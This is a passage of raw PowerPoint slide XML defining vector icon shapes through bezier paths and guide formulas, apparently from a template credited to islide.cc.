                      <a:pt x="30" y="18"/>
                      <a:pt x="39" y="12"/>
                      <a:pt x="49" y="7"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="75" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="85"/>
                      <a:pt x="81" y="85"/>
                      <a:pt x="83" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="80"/>
                      <a:pt x="85" y="77"/>
                      <a:pt x="83" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="72"/>
                      <a:pt x="77" y="72"/>
                      <a:pt x="74" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="77"/>
                      <a:pt x="72" y="81"/>
                      <a:pt x="7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8" name="Freeform 227">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C61CB62-06D9-4511-B26E-B79FCDB294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2165" y="3068712"/>
                <a:ext cx="230965" cy="227050"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 72"/>
                  <a:gd name="T1" fmla="*/ 35 h 71"/>
                  <a:gd name="T2" fmla="*/ 14 w 72"/>
                  <a:gd name="T3" fmla="*/ 33 h 71"/>
                  <a:gd name="T4" fmla="*/ 1 w 72"/>
                  <a:gd name="T5" fmla="*/ 29 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 35 h 71"/>
                  <a:gd name="T8" fmla="*/ 11 w 72"/>
                  <a:gd name="T9" fmla="*/ 62 h 71"/>
                  <a:gd name="T10" fmla="*/ 19 w 72"/>
                  <a:gd name="T11" fmla="*/ 51 h 71"/>
                  <a:gd name="T12" fmla="*/ 14 w 72"/>
                  <a:gd name="T13" fmla="*/ 35 h 71"/>
                  <a:gd name="T14" fmla="*/ 58 w 72"/>
                  <a:gd name="T15" fmla="*/ 35 h 71"/>
                  <a:gd name="T16" fmla="*/ 53 w 72"/>
                  <a:gd name="T17" fmla="*/ 51 h 71"/>
                  <a:gd name="T18" fmla="*/ 61 w 72"/>
                  <a:gd name="T19" fmla="*/ 62 h 71"/>
                  <a:gd name="T20" fmla="*/ 72 w 72"/>
                  <a:gd name="T21" fmla="*/ 35 h 71"/>
                  <a:gd name="T22" fmla="*/ 71 w 72"/>
                  <a:gd name="T23" fmla="*/ 29 h 71"/>
                  <a:gd name="T24" fmla="*/ 58 w 72"/>
                  <a:gd name="T25" fmla="*/ 33 h 71"/>
                  <a:gd name="T26" fmla="*/ 58 w 72"/>
                  <a:gd name="T27" fmla="*/ 35 h 71"/>
                  <a:gd name="T28" fmla="*/ 40 w 72"/>
                  <a:gd name="T29" fmla="*/ 13 h 71"/>
                  <a:gd name="T30" fmla="*/ 56 w 72"/>
                  <a:gd name="T31" fmla="*/ 24 h 71"/>
                  <a:gd name="T32" fmla="*/ 68 w 72"/>
                  <a:gd name="T33" fmla="*/ 20 h 71"/>
                  <a:gd name="T34" fmla="*/ 40 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 40 w 72"/>
                  <a:gd name="T37" fmla="*/ 13 h 71"/>
                  <a:gd name="T38" fmla="*/ 16 w 72"/>
                  <a:gd name="T39" fmla="*/ 24 h 71"/>
                  <a:gd name="T40" fmla="*/ 31 w 72"/>
                  <a:gd name="T41" fmla="*/ 13 h 71"/>
                  <a:gd name="T42" fmla="*/ 31 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 3 w 72"/>
                  <a:gd name="T45" fmla="*/ 20 h 71"/>
                  <a:gd name="T46" fmla="*/ 16 w 72"/>
                  <a:gd name="T47" fmla="*/ 24 h 71"/>
                  <a:gd name="T48" fmla="*/ 45 w 72"/>
                  <a:gd name="T49" fmla="*/ 56 h 71"/>
                  <a:gd name="T50" fmla="*/ 36 w 72"/>
                  <a:gd name="T51" fmla="*/ 58 h 71"/>
                  <a:gd name="T52" fmla="*/ 27 w 72"/>
                  <a:gd name="T53" fmla="*/ 56 h 71"/>
                  <a:gd name="T54" fmla="*/ 19 w 72"/>
                  <a:gd name="T55" fmla="*/ 67 h 71"/>
                  <a:gd name="T56" fmla="*/ 36 w 72"/>
                  <a:gd name="T57" fmla="*/ 71 h 71"/>
                  <a:gd name="T58" fmla="*/ 53 w 72"/>
                  <a:gd name="T59" fmla="*/ 67 h 71"/>
                  <a:gd name="T60" fmla="*/ 45 w 72"/>
                  <a:gd name="T61" fmla="*/ 5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1">
                    <a:moveTo>
                      <a:pt x="14" y="35"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="35"/>
                      <a:pt x="14" y="34"/>
                      <a:pt x="14" y="33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31"/>
                      <a:pt x="0" y="33"/>
                      <a:pt x="0" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="46"/>
                      <a:pt x="4" y="55"/>
                      <a:pt x="11" y="62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6" y="47"/>
                      <a:pt x="14" y="41"/>
                      <a:pt x="14" y="35"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="58" y="35"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="41"/>
                      <a:pt x="56" y="47"/>
                      <a:pt x="53" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="62"/>
                      <a:pt x="61" y="62"/>
                      <a:pt x="61" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="55"/>
                      <a:pt x="72" y="46"/>
                      <a:pt x="72" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="33"/>
                      <a:pt x="72" y="31"/>
                      <a:pt x="71" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="34"/>
                      <a:pt x="58" y="35"/>
                      <a:pt x="58" y="35"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="40" y="13"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="15"/>
                      <a:pt x="52" y="19"/>
                      <a:pt x="56" y="24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3" y="9"/>
                      <a:pt x="53" y="1"/>
                      <a:pt x="40" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="40" y="13"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="16" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="19"/>
                      <a:pt x="25" y="15"/>
                      <a:pt x="31" y="1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9" y="1"/>
                      <a:pt x="9" y="9"/>
                      <a:pt x="3" y="20"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16" y="24"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="45" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="57"/>
                      <a:pt x="39" y="58"/>
                      <a:pt x="36" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="58"/>
                      <a:pt x="30" y="57"/>
                      <a:pt x="27" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="67"/>
                      <a:pt x="19" y="67"/>
                      <a:pt x="19" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="70"/>
                      <a:pt x="30" y="71"/>
                      <a:pt x="36" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="71"/>
                      <a:pt x="48" y="70"/>
                      <a:pt x="53" y="67"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="45" y="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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="159" name="Freeform 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{929E3B49-E9AE-4374-A38A-CE61F5180D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09033" y="762985"/>
                <a:ext cx="189861" cy="187904"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 59"/>
                  <a:gd name="T1" fmla="*/ 0 h 59"/>
                  <a:gd name="T2" fmla="*/ 0 w 59"/>
                  <a:gd name="T3" fmla="*/ 29 h 59"/>
                  <a:gd name="T4" fmla="*/ 30 w 59"/>
                  <a:gd name="T5" fmla="*/ 59 h 59"/>
                  <a:gd name="T6" fmla="*/ 59 w 59"/>
                  <a:gd name="T7" fmla="*/ 29 h 59"/>
                  <a:gd name="T8" fmla="*/ 30 w 59"/>
                  <a:gd name="T9" fmla="*/ 0 h 59"/>
                  <a:gd name="T10" fmla="*/ 47 w 59"/>
                  <a:gd name="T11" fmla="*/ 25 h 59"/>
                  <a:gd name="T12" fmla="*/ 31 w 59"/>
                  <a:gd name="T13" fmla="*/ 47 h 59"/>
                  <a:gd name="T14" fmla="*/ 24 w 59"/>
                  <a:gd name="T15" fmla="*/ 44 h 59"/>
                  <a:gd name="T16" fmla="*/ 18 w 59"/>
                  <a:gd name="T17" fmla="*/ 27 h 59"/>
                  <a:gd name="T18" fmla="*/ 14 w 59"/>
                  <a:gd name="T19" fmla="*/ 28 h 59"/>
                  <a:gd name="T20" fmla="*/ 12 w 59"/>
                  <a:gd name="T21" fmla="*/ 26 h 59"/>
                  <a:gd name="T22" fmla="*/ 23 w 59"/>
                  <a:gd name="T23" fmla="*/ 18 h 59"/>
                  <a:gd name="T24" fmla="*/ 29 w 59"/>
                  <a:gd name="T25" fmla="*/ 30 h 59"/>
                  <a:gd name="T26" fmla="*/ 32 w 59"/>
                  <a:gd name="T27" fmla="*/ 37 h 59"/>
                  <a:gd name="T28" fmla="*/ 36 w 59"/>
                  <a:gd name="T29" fmla="*/ 31 h 59"/>
                  <a:gd name="T30" fmla="*/ 32 w 59"/>
                  <a:gd name="T31" fmla="*/ 26 h 59"/>
                  <a:gd name="T32" fmla="*/ 47 w 59"/>
                  <a:gd name="T33" fmla="*/ 2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" h="59">
                    <a:moveTo>
                      <a:pt x="30" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="0"/>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="45"/>
                      <a:pt x="14" y="59"/>
                      <a:pt x="30" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="59"/>
                      <a:pt x="59" y="45"/>
                      <a:pt x="59" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="13"/>
                      <a:pt x="46" y="0"/>
                      <a:pt x="30" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="47" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="36"/>
                      <a:pt x="34" y="45"/>
                      <a:pt x="31" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="49"/>
                      <a:pt x="25" y="46"/>
                      <a:pt x="24" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="42"/>
                      <a:pt x="19" y="28"/>
                      <a:pt x="18" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="25"/>
                      <a:pt x="14" y="28"/>
                      <a:pt x="14" y="28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6"/>
                      <a:pt x="18" y="19"/>
                      <a:pt x="23" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="17"/>
                      <a:pt x="28" y="25"/>
                      <a:pt x="29" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="34"/>
                      <a:pt x="31" y="37"/>
                      <a:pt x="32" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="37"/>
                      <a:pt x="34" y="34"/>
                      <a:pt x="36" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="27"/>
                      <a:pt x="36" y="23"/>
                      <a:pt x="32" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="16"/>
                      <a:pt x="49" y="14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>
                  <a:solidFill>
                    <a:schemeClr val="dk1">
                      <a:lumMod val="10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4" y="1123950"/>
            <a:ext cx="10850563" cy="5019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395955A-F918-4BB3-9947-5DE5A2145AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1028700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2017/10/22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www.islide.cc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1540BBE-9C1C-4900-80C8-D6672E38A0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1028700"/>
            <a:ext cx="1085056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圆角矩形标注 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{987F7E32-D042-4CD6-A044-91A762C72FA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2229677" y="2097327"/>
            <a:ext cx="5943600" cy="1453896"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42679"/>
              <a:gd name="adj2" fmla="val 73192"/>
              <a:gd name="adj3" fmla="val 16667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F42AA3-18D1-406F-91E4-BA9DEF294987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-82177" y="-134484"/>
            <a:ext cx="12356354" cy="7126968"/>
            <a:chOff x="-64979" y="-137511"/>
            <a:chExt cx="12356354" cy="7126968"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="5000"/>
            </a:schemeClr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DC6BC0C-4979-4ADC-B08C-D58CB234A1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767775">
              <a:off x="-47644" y="1201848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B0DF95D-CB2E-44C9-A86C-FCDBAC1CC5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5145695">
              <a:off x="5320634" y="1537188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BC3FDD2-DC86-49B0-9A35-98AEAEE3D1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058153">
              <a:off x="4559094" y="2564615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5873354-5DDB-48BF-B0A7-AA0EB2E05C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164480">
              <a:off x="3703956" y="1701791"/>
              <a:ext cx="720725" cy="695325"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 165 w 192"/>
                <a:gd name="T1" fmla="*/ 65 h 185"/>
                <a:gd name="T2" fmla="*/ 192 w 192"/>
                <a:gd name="T3" fmla="*/ 137 h 185"/>
                <a:gd name="T4" fmla="*/ 0 w 192"/>
                <a:gd name="T5" fmla="*/ 185 h 185"/>
                <a:gd name="T6" fmla="*/ 11 w 192"/>
                <a:gd name="T7" fmla="*/ 137 h 185"/>
                <a:gd name="T8" fmla="*/ 43 w 192"/>
                <a:gd name="T9" fmla="*/ 49 h 185"/>
                <a:gd name="T10" fmla="*/ 105 w 192"/>
                <a:gd name="T11" fmla="*/ 49 h 185"/>
                <a:gd name="T12" fmla="*/ 112 w 192"/>
                <a:gd name="T13" fmla="*/ 36 h 185"/>
                <a:gd name="T14" fmla="*/ 83 w 192"/>
                <a:gd name="T15" fmla="*/ 0 h 185"/>
                <a:gd name="T16" fmla="*/ 164 w 192"/>
                <a:gd name="T17" fmla="*/ 36 h 185"/>
                <a:gd name="T18" fmla="*/ 136 w 192"/>
                <a:gd name="T19" fmla="*/ 49 h 185"/>
                <a:gd name="T20" fmla="*/ 148 w 192"/>
                <a:gd name="T21" fmla="*/ 28 h 185"/>
                <a:gd name="T22" fmla="*/ 100 w 192"/>
                <a:gd name="T23" fmla="*/ 9 h 185"/>
                <a:gd name="T24" fmla="*/ 148 w 192"/>
                <a:gd name="T25" fmla="*/ 28 h 185"/>
                <a:gd name="T26" fmla="*/ 148 w 192"/>
                <a:gd name="T27" fmla="*/ 104 h 185"/>
                <a:gd name="T28" fmla="*/ 136 w 192"/>
                <a:gd name="T29" fmla="*/ 92 h 185"/>
                <a:gd name="T30" fmla="*/ 136 w 192"/>
                <a:gd name="T31" fmla="*/ 116 h 185"/>
                <a:gd name="T32" fmla="*/ 148 w 192"/>
                <a:gd name="T33" fmla="*/ 128 h 185"/>
                <a:gd name="T34" fmla="*/ 136 w 192"/>
                <a:gd name="T35" fmla="*/ 116 h 185"/>
                <a:gd name="T36" fmla="*/ 124 w 192"/>
                <a:gd name="T37" fmla="*/ 104 h 185"/>
                <a:gd name="T38" fmla="*/ 112 w 192"/>
                <a:gd name="T39" fmla="*/ 92 h 185"/>
                <a:gd name="T40" fmla="*/ 112 w 192"/>
                <a:gd name="T41" fmla="*/ 116 h 185"/>
                <a:gd name="T42" fmla="*/ 124 w 192"/>
                <a:gd name="T43" fmla="*/ 128 h 185"/>
                <a:gd name="T44" fmla="*/ 112 w 192"/>
                <a:gd name="T45" fmla="*/ 116 h 185"/>
                <a:gd name="T46" fmla="*/ 124 w 192"/>
                <a:gd name="T47" fmla="*/ 80 h 185"/>
                <a:gd name="T48" fmla="*/ 112 w 192"/>
                <a:gd name="T49" fmla="*/ 68 h 185"/>
                <a:gd name="T50" fmla="*/ 136 w 192"/>
                <a:gd name="T51" fmla="*/ 68 h 185"/>
                <a:gd name="T52" fmla="*/ 148 w 192"/>
                <a:gd name="T53" fmla="*/ 80 h 185"/>
                <a:gd name="T54" fmla="*/ 136 w 192"/>
                <a:gd name="T55" fmla="*/ 68 h 185"/>
                <a:gd name="T56" fmla="*/ 12 w 192"/>
                <a:gd name="T57" fmla="*/ 168 h 185"/>
                <a:gd name="T58" fmla="*/ 179 w 192"/>
                <a:gd name="T59" fmla="*/ 148 h 185"/>
                <a:gd name="T60" fmla="*/ 96 w 192"/>
                <a:gd name="T61" fmla="*/ 68 h 185"/>
                <a:gd name="T62" fmla="*/ 36 w 192"/>
                <a:gd name="T63" fmla="*/ 96 h 185"/>
                <a:gd name="T64" fmla="*/ 96 w 192"/>
                <a:gd name="T65" fmla="*/ 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2" h="185">
                  <a:moveTo>
                    <a:pt x="147" y="49"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="49"/>
                    <a:pt x="165" y="57"/>
                    <a:pt x="165" y="65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25" y="57"/>
                    <a:pt x="33" y="49"/>
                    <a:pt x="43" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="49"/>
                    <a:pt x="70" y="49"/>
                    <a:pt x="95" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="49"/>
                    <a:pt x="101" y="49"/>
                    <a:pt x="105" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="49"/>
                    <a:pt x="110" y="49"/>
                    <a:pt x="112" y="49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42" y="49"/>
                    <a:pt x="147" y="49"/>
                    <a:pt x="147" y="49"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="9"/>
                    <a:pt x="148" y="9"/>
                    <a:pt x="148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28"/>
                    <a:pt x="100" y="28"/>
                    <a:pt x="100" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="28"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="104"/>
                    <a:pt x="148" y="104"/>
                    <a:pt x="148" y="104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36" y="92"/>
                    <a:pt x="136" y="92"/>
                    <a:pt x="136" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136" y="104"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="116"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="128"/>
                    <a:pt x="136" y="128"/>
                    <a:pt x="136" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="128"/>
                    <a:pt x="142" y="128"/>
                    <a:pt x="148" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="116"/>
                    <a:pt x="148" y="116"/>
                    <a:pt x="148" y="116"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136" y="116"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="104"/>
                    <a:pt x="124" y="104"/>
                    <a:pt x="124" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="92"/>
                    <a:pt x="124" y="92"/>
                    <a:pt x="124" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="92"/>
                    <a:pt x="112" y="92"/>
                    <a:pt x="112" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="104"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112" y="116"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="128"/>
                    <a:pt x="112" y="128"/>
                    <a:pt x="112" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="128"/>
                    <a:pt x="120" y="128"/>
                    <a:pt x="124" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="116"/>
                    <a:pt x="124" y="116"/>
                    <a:pt x="124" y="116"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="116"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="112" y="80"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="80"/>
                    <a:pt x="124" y="80"/>
                    <a:pt x="124" y="80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20" y="68"/>
                    <a:pt x="117" y="68"/>
                    <a:pt x="112" y="68"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="80"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="136" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="80"/>
                    <a:pt x="136" y="80"/>
                    <a:pt x="136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68"/>
                    <a:pt x="148" y="68"/>
                    <a:pt x="148" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="68"/>
                    <a:pt x="142" y="68"/>
                    <a:pt x="136" y="68"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="14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9" y="148"/>
                    <a:pt x="179" y="148"/>
                    <a:pt x="179" y="148"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="148"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="96" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="68"/>
                    <a:pt x="52" y="68"/>
                    <a:pt x="36" y="68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51" y="96"/>
                    <a:pt x="75" y="96"/>
                    <a:pt x="96" y="96"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="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0BD80C57-F7BD-456E-9C49-11D9B3773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6885">
              <a:off x="8109833" y="847785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6CE644A2-18F5-48B0-8C56-C786C81DC8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567118">
              <a:off x="6851410" y="2471398"/>
              <a:ext cx="750888" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 200"/>
                <a:gd name="T1" fmla="*/ 148 h 200"/>
                <a:gd name="T2" fmla="*/ 158 w 200"/>
                <a:gd name="T3" fmla="*/ 148 h 200"/>
                <a:gd name="T4" fmla="*/ 134 w 200"/>
                <a:gd name="T5" fmla="*/ 126 h 200"/>
                <a:gd name="T6" fmla="*/ 159 w 200"/>
                <a:gd name="T7" fmla="*/ 104 h 200"/>
                <a:gd name="T8" fmla="*/ 193 w 200"/>
                <a:gd name="T9" fmla="*/ 104 h 200"/>
                <a:gd name="T10" fmla="*/ 200 w 200"/>
                <a:gd name="T11" fmla="*/ 110 h 200"/>
                <a:gd name="T12" fmla="*/ 200 w 200"/>
                <a:gd name="T13" fmla="*/ 141 h 200"/>
                <a:gd name="T14" fmla="*/ 193 w 200"/>
                <a:gd name="T15" fmla="*/ 148 h 200"/>
                <a:gd name="T16" fmla="*/ 152 w 200"/>
                <a:gd name="T17" fmla="*/ 117 h 200"/>
                <a:gd name="T18" fmla="*/ 143 w 200"/>
                <a:gd name="T19" fmla="*/ 126 h 200"/>
                <a:gd name="T20" fmla="*/ 152 w 200"/>
                <a:gd name="T21" fmla="*/ 136 h 200"/>
                <a:gd name="T22" fmla="*/ 162 w 200"/>
                <a:gd name="T23" fmla="*/ 126 h 200"/>
                <a:gd name="T24" fmla="*/ 152 w 200"/>
                <a:gd name="T25" fmla="*/ 117 h 200"/>
                <a:gd name="T26" fmla="*/ 134 w 200"/>
                <a:gd name="T27" fmla="*/ 152 h 200"/>
                <a:gd name="T28" fmla="*/ 192 w 200"/>
                <a:gd name="T29" fmla="*/ 152 h 200"/>
                <a:gd name="T30" fmla="*/ 192 w 200"/>
                <a:gd name="T31" fmla="*/ 166 h 200"/>
                <a:gd name="T32" fmla="*/ 160 w 200"/>
                <a:gd name="T33" fmla="*/ 200 h 200"/>
                <a:gd name="T34" fmla="*/ 33 w 200"/>
                <a:gd name="T35" fmla="*/ 200 h 200"/>
                <a:gd name="T36" fmla="*/ 0 w 200"/>
                <a:gd name="T37" fmla="*/ 166 h 200"/>
                <a:gd name="T38" fmla="*/ 0 w 200"/>
                <a:gd name="T39" fmla="*/ 87 h 200"/>
                <a:gd name="T40" fmla="*/ 33 w 200"/>
                <a:gd name="T41" fmla="*/ 52 h 200"/>
                <a:gd name="T42" fmla="*/ 160 w 200"/>
                <a:gd name="T43" fmla="*/ 52 h 200"/>
                <a:gd name="T44" fmla="*/ 192 w 200"/>
                <a:gd name="T45" fmla="*/ 87 h 200"/>
                <a:gd name="T46" fmla="*/ 192 w 200"/>
                <a:gd name="T47" fmla="*/ 100 h 200"/>
                <a:gd name="T48" fmla="*/ 133 w 200"/>
                <a:gd name="T49" fmla="*/ 100 h 200"/>
                <a:gd name="T50" fmla="*/ 134 w 200"/>
                <a:gd name="T51" fmla="*/ 152 h 200"/>
                <a:gd name="T52" fmla="*/ 117 w 200"/>
                <a:gd name="T53" fmla="*/ 21 h 200"/>
                <a:gd name="T54" fmla="*/ 60 w 200"/>
                <a:gd name="T55" fmla="*/ 44 h 200"/>
                <a:gd name="T56" fmla="*/ 27 w 200"/>
                <a:gd name="T57" fmla="*/ 44 h 200"/>
                <a:gd name="T58" fmla="*/ 121 w 200"/>
                <a:gd name="T59" fmla="*/ 0 h 200"/>
                <a:gd name="T60" fmla="*/ 155 w 200"/>
                <a:gd name="T61" fmla="*/ 44 h 200"/>
                <a:gd name="T62" fmla="*/ 134 w 200"/>
                <a:gd name="T63" fmla="*/ 44 h 200"/>
                <a:gd name="T64" fmla="*/ 117 w 200"/>
                <a:gd name="T65" fmla="*/ 2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200">
                  <a:moveTo>
                    <a:pt x="193" y="148"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="148"/>
                    <a:pt x="177" y="148"/>
                    <a:pt x="158" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="148"/>
                    <a:pt x="134" y="144"/>
                    <a:pt x="134" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="110"/>
                    <a:pt x="144" y="104"/>
                    <a:pt x="159" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="104"/>
                    <a:pt x="193" y="104"/>
                    <a:pt x="193" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="104"/>
                    <a:pt x="200" y="107"/>
                    <a:pt x="200" y="11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0" y="145"/>
                    <a:pt x="197" y="148"/>
                    <a:pt x="193" y="148"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="152" y="117"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="117"/>
                    <a:pt x="143" y="121"/>
                    <a:pt x="143" y="126"/>
